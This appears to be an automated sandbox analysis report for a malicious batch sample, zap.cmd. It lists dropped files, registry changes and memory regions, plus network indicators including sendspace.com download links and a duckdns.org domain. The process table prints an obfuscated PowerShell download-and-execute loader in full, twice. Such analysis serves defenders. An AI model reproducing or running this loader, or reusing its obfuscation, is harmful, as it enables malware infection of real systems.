Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
zap.cmd
|
ASCII text, with very long lines (6229), with no line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1cyjwm3f.enn.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_trerqzvk.t1n.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhdutsjh.vxt.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zggjvx1h.qtt.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Innumerable.Sno
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VU7C3MF82ACSTAFRWRJN.temp
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\zap.cmd" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -windowstyle hidden "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers
-lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke( $fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function
Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede 'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0
R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn
Overhx Prer6 Varm4Nivea; Pi,d Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk
s/F.gtf2T.len0Zenuw1Smmom0Pra.k0 ,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0
Wool ';$Tudkoppernes=hdrede 'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve:
Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. Didecthu,do RivamSt,tu/Soldap
dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede
' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a
Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B
adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr
FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer
');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG
wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst
Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig=
(hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib-
Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib
BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH
Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster
Virko Barnp G ne ');$Emplanes=hdrede 'Super$PondsPMonocySkrddrSensua WaldnAltico Aggri B ofdUnd.r.Go wiDTv.faoTriplwSk.tenBas
slDot.noUnrubaPhysidAn,roFSuperi.alacl oreaeTande(Offer$AttraL Stito Rep.dP.rnod.xhaleBajonnFjerndNonreeStrans Swea,Hyper$Gi,lyBThermrSofa
a VelknBesprdAfgift pu.raUnatulMoraletorp.rBaga.nForvieTanke)Blsop ';$Brandtalerne=$Boglrdes[0];Smrkers (hdrede ' Nati$Namarg
,dkllG,ainoKontrbUndera.kidel.seud:cauldWModele unids EmbrlCoa,jeEnodayCivicij,llasOvnlamRewei9N.rma0Buffi=Overt( t afTMagtbeE,linsEf,ustIndsm-HushoPsamplaPhthatConvihAutoc
Kinne$ContrBStenorNonseaBlkklnOxhordUngautCivila CoralrenteeGlimrrWal mnVeugleInsim)Cyc o ');while (!$Wesleyism90) {Smrkers
(hdrede 'Legum$Mandag DivelFraadopro.abConsua Jagtl Torf:Tug eAUddykuSu ulmSlowfaSpy.kgMutuaaGl,tt=Sp.se$SolistFugtfr ndsiuSoviee
pun ') ;Smrkers $Emplanes;Smrkers (hdrede 'neuroS,ugtutGoldsa.ylesrRaf,itErsta- Vat,SU,envlTr,moeNringeSakulpM chi Efflo4For,r
');Smrkers (hdrede 'Behag$ jemvg,rammlTrompo RulabGavlhahage,lSamsp:G.addW And egablesRotunl Paroe Ta,syCentriSerboscercimF.rbu9Aboli0
har=f rme( DiscTTo pleSagfrsDob,etFlerv-Rund.PSammeaSkylltYndigh Bn s svovl$Ttn nBSax fr,reinaDeo ynBajadd Benjt.rochaStubblPretreUnconr
,hennIre eeTintn)Infes ') ;Smrkers (hdrede 'Panno$huen,g Va,dl adreo Kr sbAmbosa StrilStryg:Tro aNEkstraRododb S raoStarti
KoranAlabatSighteKursurOarl.vGunvoaRebapl Em,slMontreAnorct OmsvsU sty=Aaleg$Re.tigGuidolOrienoPolstbUndosaTi kllLejli:KorntPDeambrComp
t SubheooblanMinictMiddliYunkesLagertOdyss+Da,ha+Hj.es% Wood$ZulhiS.nempoBarbemTserbmFelaheWel,er,ashhfGhaneu.ipargHerenlOpnaaeSalgsmFuldmoFettsdSvigteErgo.lTereslPerfue
DiserGoorosNepa..Toccac Forno S mtuEkspon BagltTermo ') ;$Loddendes=$Sommerfuglemodellers[$Nabointervallets];}$Programpakke=340015;$Leath=26897;Smrkers
(hdrede ',kris$HypergCoopelKnaldoUmorabGtersaKvintlF.ail:Sdes CNringoForb.nScir fIncurlSixmoa .isctBenedeHanga Destr= Indo
ScrumGTe.hne AlqutTae i-LkkerC AnveoAeolon CholtC ocaeUltran.rstetPeace Raptu$varieBU prer AppeaByvaan LngddKn trtSkue.aGramml
B.lteU.derrSpacin Bofoe Brak ');Smrkers (hdrede 'Raket$.oknigRebral TabeoCephab.oophaUdboml Bass:PraetAForrelDoku bGenreiTeamen
SvovoAcc,lePox.nn Capa Acron=Overs Ge,ni[DokumS.nwaly steosDybdetForskeImponmSmede.R sciC HippoKorrentringvAfnazeimperrShohetRampo]Idiom:Super:L,phiFGill.r
Sunso Tranm BidrB.leipaAtom,sUnpure Vika6 est4ElectS Pip.tTroldrM,croi WadmnP tgigPand.(Pter,$ TracC Ko.goSped.nPilhefSemiflRin,ea
BrantJordve.aane)Dodec ');Smrkers (hdrede ' Unla$SpheggH ngal SpiloTylotbFor,aa FlytlD rth:Unna,AFordomUnsapp KenyuIdolit
SoejeVar.ledogm sLokal .icqu=Deorb Trime[BarkaSbenv.yOverdsMonomtDissee ummmSagsk.UfrihT A.fdeS lidxArcadtjeapo.SalthEGl.ednSiv
rcForgeoUmbosdBronciWate,n De.og,idym]Kunde:Dis,e:MoeriASangdSBurlaCReachI limI,ohor.DentiGUnmapeObliqtM.edsS EleptEndosrS.guaiDiakon
Undegvitro(Unp,r$ProduAnonanl Drbeb ,horiE tern WankoInt,reUnsysnFo be)Etats ');Smrkers (hdrede 'Frank$NorthgNobl lUdlaao,agplbStudea
serolTuber: BiofAFilipl KissvNonnaa Lo an Mikk= Nat $Sej tA asermOvercpMonjauEquiltSi hoeBastaeStnkesChapp.UnremsMicr uChirobC.rvisMa
ultUdsgnrHeinriInconnIgl egVene.(Handw$BlitzPQuipsrHjemmo sa vgHab.trHalola RechmPelsdpInsalaUnc lkAbdickSuseneLowwo, Angr$
UninLTilvre E traneglitResishRedni)C.ssa ');Smrkers $Alvan;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Sulphuric = 1;$Plethorous='Sub';$Plethorous+='strin';$Plethorous+='g';Function
hdrede($Blaastakkens){$Preflood=$Blaastakkens.Length-$Sulphuric;For($fstningsvrkers=5;$fstningsvrkers -lt $Preflood;$fstningsvrkers+=6){$Handelsstandsforenings251+=$Blaastakkens.$Plethorous.Invoke(
$fstningsvrkers, $Sulphuric);}$Handelsstandsforenings251;}function Smrkers($Scooch){& ($Traguloidea) ($Scooch);}$Stikprop=hdrede
'HjlpeMNvninoKlip zBrothi Uds lDagsbl f,rmaKb.va/Nices5Woodb.Monas0 R.fl Ac.om(pladeWSuffoi Annon,loofddum,eo Arbew KilosCarpo
ronNFemi TKingp Kloak1Lfted0Misst.Monop0Danto;Ste i Alg,rWO lsniLyksanMedio6Skatt4Anlgs;Unomn Overhx Prer6 Varm4Nivea; Pi,d
Pol trDegrevPhth,:Overj1brai.2 Avar1.ands.Friti0Bedr.) Hore SkraaG TutmeSingacReseikG.ammoMrk s/F.gtf2T.len0Zenuw1Smmom0Pra.k0
,ons1gldel0 etur1Sw pl VirgiFMateriTraa,r.rikteSk lafTitraoEriocx pre./No,il1Dilet2Tjrek1.esgs.L,sin0 Wool ';$Tudkoppernes=hdrede
'MoneyUFranksPrecieDa omrBanal- MajoA Lactg InapeUndern ignt eca ';$Loddendes=hdrede 'bela,hSambetBackhtSpattpFornusFarve:
Exed/Agerj/Untanwhemi,wAntemw dapi.Preles,omiteFo,brnScrold AswisSin,lpModbyaS,mbicF ytteMod.v. Didecthu,do RivamSt,tu/Soldap
dybhrhemogo rbe/UnchrdGkkerl De,t/Preafj.ostbjThrif4StinkuTauriw A,st4 Dyre ';$Gainyield=hdrede 'Pino,> orma ';$Traguloidea=hdrede
' LeeuiPhiloeCotylxBront ';$Sogneprst='Khediviah';$Indlaes = hdrede ' Ar.eeU derc Parahdir yo Ekss Geogl% Frdia LovtpDisorpFremtdSynf,a
Uropt Kn.sa iara% I dp\te,esI MohanFolk.nFarmeuSensimNeur,eTrster NazaaSemi b BarnlMutone Swee.T,oppS AandnMacr.oFanta ,nder&Im.od&B
adm UrosteFr,ntcAcleihA.gosoElvte SerietSe in ';Smrkers (hdrede 'Histo$Whispg Taknl Unr,o UntrbForbra WorklAbsal: MicrBGasrroDentagBi.enlRgerlr
FortdEsslie PerssSatch=D.gdr(SylfecBaha,mSkambdTwadd ele/Aft,ec ,ugh Mis,m$SerosI UntenEntomdTrforlTendeadeporeDiktasSnupp)spoer
');Smrkers (hdrede ' Valu$daimigNonr l.egago,entebFe.icaMo ndlsvvef:ForveSOv rto StndmPrdikmSiwase offlrBl sdfNiveauMislagBaronlG.evdeAnatemN.ghto.ugledVenlieG
wkilPopullZy,odekmninr,kabesFin.a=Forst$N.triLTagaso Bio.d Eos.dAg iceTransn.ankidO gaveOutw sFanga.ItalisDirtbpMelitlEderniforlst
Subs(Amatr$SulfoGBrndsa OrgaiPet onUnlabySelvbiMa.iseMayollAlpetd Dagd) Ener ');$Loddendes=$Sommerfuglemodellers[0];$Lngerevarig=
(hdrede 'Ironi$AfstegAnlgklOutseoDadleb IsotaindfalMaste:.krueP TrkkyDelberForniasjoven.noffoOver,iKataldBipro= Sug N MinueTilenwFilib-
Ank,OUnmanb AclujbogleeFld,sc Reg,t Deba PresoSBelemyS grnsSkifttMagneeLegitm Udby.h.artNProfie Moustoutbo. Pa,tWFragme Skrib
BertCRitualHoggii aurseDis,enSublit');$Lngerevarig+=$Boglrdes[1];Smrkers ($Lngerevarig);Smrkers (hdrede 'bomol$SansaPF.rveySt,derAnsteaPeriknFejlno.lempiConcadBalle.TilbyH
Lo ieCorroa SpildRampiebrisarudspesFremt[ utte$SnkelTBa,keuKynu.dS ramkHelleo SignpPerspp LacteBasbarB whon Re,oeDepetsOrigi]Ha,rs=.rese$TandgSMachetCladoiA.stekSkribpEkster
Virko Barnp G ne ');$Emplanes=hdrede 'Super$PondsPMonocySkrddrSensua WaldnAltico Aggri B ofdUnd.r.Go wiDTv.faoTriplwSk.tenBas
slDot.noUnrubaPhysidAn,roFSuperi.alacl oreaeTande(Offer$AttraL Stito Rep.dP.rnod.xhaleBajonnFjerndNonreeStrans Swea,Hyper$Gi,lyBThermrSofa
a VelknBesprdAfgift pu.raUnatulMoraletorp.rBaga.nForvieTanke)Blsop ';$Brandtalerne=$Boglrdes[0];Smrkers (hdrede ' Nati$Namarg
,dkllG,ainoKontrbUndera.kidel.seud:cauldWModele unids EmbrlCoa,jeEnodayCivicij,llasOvnlamRewei9N.rma0Buffi=Overt( t afTMagtbeE,linsEf,ustIndsm-HushoPsamplaPhthatConvihAutoc
Kinne$ContrBStenorNonseaBlkklnOxhordUngautCivila CoralrenteeGlimrrWal mnVeugleInsim)Cyc o ');while (!$Wesleyism90) {Smrkers
(hdrede 'Legum$Mandag DivelFraadopro.abConsua Jagtl Torf:Tug eAUddykuSu ulmSlowfaSpy.kgMutuaaGl,tt=Sp.se$SolistFugtfr ndsiuSoviee
pun ') ;Smrkers $Emplanes;Smrkers (hdrede 'neuroS,ugtutGoldsa.ylesrRaf,itErsta- Vat,SU,envlTr,moeNringeSakulpM chi Efflo4For,r
');Smrkers (hdrede 'Behag$ jemvg,rammlTrompo RulabGavlhahage,lSamsp:G.addW And egablesRotunl Paroe Ta,syCentriSerboscercimF.rbu9Aboli0
har=f rme( DiscTTo pleSagfrsDob,etFlerv-Rund.PSammeaSkylltYndigh Bn s svovl$Ttn nBSax fr,reinaDeo ynBajadd Benjt.rochaStubblPretreUnconr
,hennIre eeTintn)Infes ') ;Smrkers (hdrede 'Panno$huen,g Va,dl adreo Kr sbAmbosa StrilStryg:Tro aNEkstraRododb S raoStarti
KoranAlabatSighteKursurOarl.vGunvoaRebapl Em,slMontreAnorct OmsvsU sty=Aaleg$Re.tigGuidolOrienoPolstbUndosaTi kllLejli:KorntPDeambrComp
t SubheooblanMinictMiddliYunkesLagertOdyss+Da,ha+Hj.es% Wood$ZulhiS.nempoBarbemTserbmFelaheWel,er,ashhfGhaneu.ipargHerenlOpnaaeSalgsmFuldmoFettsdSvigteErgo.lTereslPerfue
DiserGoorosNepa..Toccac Forno S mtuEkspon BagltTermo ') ;$Loddendes=$Sommerfuglemodellers[$Nabointervallets];}$Programpakke=340015;$Leath=26897;Smrkers
(hdrede ',kris$HypergCoopelKnaldoUmorabGtersaKvintlF.ail:Sdes CNringoForb.nScir fIncurlSixmoa .isctBenedeHanga Destr= Indo
ScrumGTe.hne AlqutTae i-LkkerC AnveoAeolon CholtC ocaeUltran.rstetPeace Raptu$varieBU prer AppeaByvaan LngddKn trtSkue.aGramml
B.lteU.derrSpacin Bofoe Brak ');Smrkers (hdrede 'Raket$.oknigRebral TabeoCephab.oophaUdboml Bass:PraetAForrelDoku bGenreiTeamen
SvovoAcc,lePox.nn Capa Acron=Overs Ge,ni[DokumS.nwaly steosDybdetForskeImponmSmede.R sciC HippoKorrentringvAfnazeimperrShohetRampo]Idiom:Super:L,phiFGill.r
Sunso Tranm BidrB.leipaAtom,sUnpure Vika6 est4ElectS Pip.tTroldrM,croi WadmnP tgigPand.(Pter,$ TracC Ko.goSped.nPilhefSemiflRin,ea
BrantJordve.aane)Dodec ');Smrkers (hdrede ' Unla$SpheggH ngal SpiloTylotbFor,aa FlytlD rth:Unna,AFordomUnsapp KenyuIdolit
SoejeVar.ledogm sLokal .icqu=Deorb Trime[BarkaSbenv.yOverdsMonomtDissee ummmSagsk.UfrihT A.fdeS lidxArcadtjeapo.SalthEGl.ednSiv
rcForgeoUmbosdBronciWate,n De.og,idym]Kunde:Dis,e:MoeriASangdSBurlaCReachI limI,ohor.DentiGUnmapeObliqtM.edsS EleptEndosrS.guaiDiakon
Undegvitro(Unp,r$ProduAnonanl Drbeb ,horiE tern WankoInt,reUnsysnFo be)Etats ');Smrkers (hdrede 'Frank$NorthgNobl lUdlaao,agplbStudea
serolTuber: BiofAFilipl KissvNonnaa Lo an Mikk= Nat $Sej tA asermOvercpMonjauEquiltSi hoeBastaeStnkesChapp.UnremsMicr uChirobC.rvisMa
ultUdsgnrHeinriInconnIgl egVene.(Handw$BlitzPQuipsrHjemmo sa vgHab.trHalola RechmPelsdpInsalaUnc lkAbdickSuseneLowwo, Angr$
UninLTilvre E traneglitResishRedni)C.ssa ');Smrkers $Alvan;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Innumerable.Sno && echo t"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
tbsagyw.duckdns.org
|
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://fs03n1.sendspace.com/
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/jj4uw4P
|
unknown
|
||
|
https://fs03n4.sendspace.com
|
unknown
|
||
|
https://fs03n4.sendspace.com/dlpro/2322c2dd21531059d1754f0174582ff2/664f950e/jj4uw4/Polyfon.csv
|
69.31.136.17
|
||
|
http://www.sendspace.com
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://fs03n1.sendspace.com/dlpro/47629cb82a703442a77abc2aaf0e4ed6/664f9537/ug8lu5/EwcTRqORRXkTdyku
|
unknown
|
||
|
https://www.sendspace.com
|
unknown
|
||
|
https://fs03n1.sendspace.com/v
|
unknown
|
||
|
https://fs03n1.sendspace.com/y
|
unknown
|
||
|
https://www.sendspace.com/
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/jj4uw4
|
104.21.28.80
|
||
|
http://fs03n4.sendspace.com
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://fs03n1.sendspace.com/dlpro/47629cb82a703442a77abc2aaf0e4ed6/664f9537/ug8lu5/EwcTRqORRXkTdykugKGXjGVoR103.bin
|
69.31.136.17
|
||
|
https://www.sendspace.com/%I8V
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/jj4uw4XR
|
unknown
|
||
|
https://fs03n4.sendspaX
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/ug8lu5
|
104.21.28.80
|
There are 20 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
tbsagyw.duckdns.org
|
12.202.180.134
|
|
|
|
fs03n4.sendspace.com
|
69.31.136.17
|
||
|
www.sendspace.com
|
104.21.28.80
|
||
|
fs03n1.sendspace.com
|
69.31.136.17
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
12.202.180.134
|
tbsagyw.duckdns.org
|
United States
|
|
|
|
69.31.136.17
|
fs03n4.sendspace.com
|
United States
|
||
|
104.21.28.80
|
www.sendspace.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
A044000
|
direct allocation
|
page execute and read and write
|
|
|
|
23191000
|
trusted library allocation
|
page read and write
|
|
|
|
5144000
|
remote allocation
|
page execute and read and write
|
|
|
|
8440000
|
direct allocation
|
page execute and read and write
|
|
|
|
573F000
|
trusted library allocation
|
page read and write
|
|
|
|
24C677EE000
|
trusted library allocation
|
page read and write
|
|
|
|
23170000
|
trusted library allocation
|
page read and write
|
||
|
2727000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B10000
|
heap
|
page read and write
|
||
|
9644000
|
direct allocation
|
page execute and read and write
|
||
|
26310000
|
trusted library allocation
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
26E0000
|
trusted library allocation
|
page read and write
|
||
|
22E8C000
|
stack
|
page read and write
|
||
|
3090000
|
heap
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34700000
|
trusted library allocation
|
page execute and read and write
|
||
|
741513A000
|
stack
|
page read and write
|
||
|
25710000
|
trusted library allocation
|
page read and write
|
||
|
7092000
|
heap
|
page read and write
|
||
|
24C57781000
|
trusted library allocation
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
24C5564B000
|
heap
|
page read and write
|
||
|
258B0000
|
trusted library allocation
|
page read and write
|
||
|
2B30000
|
trusted library allocation
|
page read and write
|
||
|
2972000
|
heap
|
page read and write
|
||
|
23040000
|
trusted library allocation
|
page read and write
|
||
|
77C1000
|
heap
|
page read and write
|
||
|
26320000
|
trusted library allocation
|
page read and write
|
||
|
77BA000
|
heap
|
page read and write
|
||
|
24C6F7A1000
|
heap
|
page read and write
|
||
|
24C57C7C000
|
trusted library allocation
|
page read and write
|
||
|
697E000
|
stack
|
page read and write
|
||
|
25760000
|
trusted library allocation
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
77C5000
|
heap
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
26F3000
|
trusted library allocation
|
page execute and read and write
|
||
|
22228B14000
|
heap
|
page read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
7E90000
|
heap
|
page read and write
|
||
|
231CB000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34870000
|
trusted library allocation
|
page read and write
|
||
|
258ED000
|
stack
|
page read and write
|
||
|
6EBE000
|
stack
|
page read and write
|
||
|
814D000
|
heap
|
page read and write
|
||
|
7370000
|
trusted library allocation
|
page read and write
|
||
|
29D4000
|
heap
|
page read and write
|
||
|
24C5780D000
|
trusted library allocation
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
2543C000
|
stack
|
page read and write
|
||
|
22228B15000
|
heap
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
22C5E000
|
stack
|
page read and write
|
||
|
22BDE000
|
stack
|
page read and write
|
||
|
7802000
|
heap
|
page read and write
|
||
|
688E000
|
stack
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
6AC0000
|
direct allocation
|
page read and write
|
||
|
BE44000
|
direct allocation
|
page execute and read and write
|
||
|
8149000
|
heap
|
page read and write
|
||
|
23040000
|
trusted library allocation
|
page read and write
|
||
|
24C6F8D7000
|
heap
|
page execute and read and write
|
||
|
2564B000
|
heap
|
page read and write
|
||
|
807C000
|
stack
|
page read and write
|
||
|
24C55684000
|
heap
|
page read and write
|
||
|
54F6000
|
trusted library allocation
|
page read and write
|
||
|
2910000
|
heap
|
page read and write
|
||
|
23040000
|
trusted library allocation
|
page read and write
|
||
|
6A8B000
|
stack
|
page read and write
|
||
|
7FFD347C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3454D000
|
trusted library allocation
|
page execute and read and write
|
||
|
73C0000
|
trusted library allocation
|
page read and write
|
||
|
25750000
|
trusted library allocation
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
24C67A77000
|
trusted library allocation
|
page read and write
|
||
|
7414CFE000
|
stack
|
page read and write
|
||
|
2AEE000
|
stack
|
page read and write
|
||
|
25A30000
|
trusted library allocation
|
page read and write
|
||
|
2700000
|
trusted library allocation
|
page read and write
|
||
|
2592B000
|
stack
|
page read and write
|
||
|
72FD000
|
stack
|
page read and write
|
||
|
7FFD34740000
|
trusted library allocation
|
page read and write
|
||
|
24C57620000
|
heap
|
page read and write
|
||
|
22D9E000
|
stack
|
page read and write
|
||
|
25700000
|
trusted library allocation
|
page read and write
|
||
|
272B000
|
trusted library allocation
|
page execute and read and write
|
||
|
25A40000
|
trusted library allocation
|
page read and write
|
||
|
22E4D000
|
stack
|
page read and write
|
||
|
2720000
|
trusted library allocation
|
page read and write
|
||
|
258B1000
|
trusted library allocation
|
page read and write
|
||
|
24C57080000
|
trusted library allocation
|
page read and write
|
||
|
7082000
|
heap
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
24C59548000
|
trusted library allocation
|
page read and write
|
||
|
22CDE000
|
stack
|
page read and write
|
||
|
7FFD34722000
|
trusted library allocation
|
page read and write
|
||
|
23040000
|
trusted library allocation
|
page read and write
|
||
|
252C7000
|
trusted library allocation
|
page read and write
|
||
|
24C58BE2000
|
trusted library allocation
|
page read and write
|
||
|
7740000
|
heap
|
page readonly
|
||
|
723E000
|
stack
|
page read and write
|
||
|
23120000
|
heap
|
page execute and read and write
|
||
|
7FFD34760000
|
trusted library allocation
|
page read and write
|
||
|
25479000
|
stack
|
page read and write
|
||
|
7FFD346F5000
|
trusted library allocation
|
page read and write
|
||
|
8104000
|
heap
|
page read and write
|
||
|
2309E000
|
stack
|
page read and write
|
||
|
23040000
|
trusted library allocation
|
page read and write
|
||
|
24C579AD000
|
trusted library allocation
|
page read and write
|
||
|
25A50000
|
trusted library allocation
|
page read and write
|
||
|
